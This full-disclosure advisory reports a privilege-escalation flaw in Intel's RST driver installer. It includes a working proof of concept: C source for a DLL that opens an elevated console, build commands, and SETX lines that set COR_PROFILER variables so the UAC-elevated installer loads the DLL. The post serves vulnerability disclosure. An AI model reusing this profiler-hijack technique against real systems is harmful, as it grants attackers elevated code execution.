Intel RST User Interface / Driver Privilege Escalation

Intel Rapid Storage Technology (RST) User Interface and Driver suffers from a privilege escalation vulnerability.


MD5 | e647cdaedf7e9e47e97cf2341e94e8ae

Hi @ll,

more than 2 years ago I disclosed 2 vulnerabilities leading to
local escalation of privilege in the
Intel® Rapid Storage Technology (Intel® RST) User Interface and Driver:
see <https://seclists.org/fulldisclosure/2018/Nov/45>
and <https://seclists.org/fulldisclosure/2018/Nov/52>

Intel fixed this vulnerability only in their executable installer.

Some time later Intel rewrote or rebuilt this installer (see
<https://downloadcenter.intel.com/download/29978/Intel-Rapid-Storage-Technology-Driver-Installation-Software-with-Intel-Optane-Memor
y>
for its current version 18.0.1.1138, published 10/15/2020)
and incorporated the second vulnerability.

CVSS 3.0 score: 8.2 High
CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Demonstration:
~~~~~~~~~~~~~~

0. Save the following source as sentinel.c in an arbitrary directory:

--- sentinel.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
DWORD dwReason,
CONTEXT *lpContext)
{
WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

PROCESS_INFORMATION pi;

if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}

return TRUE;
}
--- EOF ---

1. Start the command prompt of the 32-bit Windows Software Development Kit,
then run the following command lines to compile sentinel.c and link it
as sentinel.dll:

cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c
link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj
kernel32.lib

ALTERNATIVE for steps 0 and 1:

1. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it in an arbitrary directory.

2. Logon with the user account created during Windows setup.

3. Start a command prompt (unelevated!) and run the following command lines
(replace <directory> with the pathname of the directory where you built
or saved sentinel.dll):

SETX.exe COR_ENABLE_PROFILING 1
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
SETX.exe COR_PROFILER_PATH <directory>\sentinel.dll

JFTR: this is just one method to set these environment variables without
the need to elevate!

4. Download <https://downloadmirror.intel.com/29978/eng/SetupRST.exe> and
save it in an arbitrary directory.

5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then
admire the console windows showing the output of WHOAMI.exe running
elevated.

stay tuned, and FAR AWAY from vulnerable crap built by Intel
Stefan Kanthak




Related Posts